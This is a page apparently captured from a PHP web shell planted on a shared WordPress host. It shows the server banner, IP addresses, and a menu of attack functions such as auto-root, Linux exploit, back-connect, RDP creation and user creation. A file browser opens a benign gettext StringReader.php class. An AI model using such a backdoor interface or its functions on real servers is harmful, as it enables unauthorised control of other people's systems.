Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
gettext /
gettext /
src /
Utils /
[ HOME SHELL ]
Name
Size
Permission
Action
CsvTrait.php
1.39
KB
-rw-r--r--
DictionaryTrait.php
1.48
KB
-rw-r--r--
FunctionsScanner.php
5.32
KB
-rw-r--r--
HeadersExtractorTrait.php
1.62
KB
-rw-r--r--
HeadersGeneratorTrait.php
567
B
-rw-r--r--
JsFunctionsScanner.php
9.23
KB
-rw-r--r--
MultidimensionalArrayTrait.php
3.18
KB
-rw-r--r--
ParsedComment.php
3.09
KB
-rw-r--r--
ParsedFunction.php
3.62
KB
-rw-r--r--
PhpFunctionsScanner.php
5.91
KB
-rw-r--r--
StringReader.php
971
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : StringReader.php
<?php namespace Gettext\Utils; class StringReader { public $pos; public $str; public $strlen; /** * Constructor. * * @param string $str The string to read */ public function __construct($str) { $this->pos = 0; $this->str = $str; $this->strlen = strlen($this->str); } /** * Read and returns a part of the string. * * @param int $bytes The number of bytes to read * * @return string */ public function read($bytes) { $data = substr($this->str, $this->pos, $bytes); $this->seekto($this->pos + $bytes); return $data; } /** * Move the cursor to a specific position. * * @param int $pos The amount of bytes to move * * @return int The new position */ public function seekto($pos) { $this->pos = ($this->strlen < $pos) ? $this->strlen : $pos; return $this->pos; } }
Close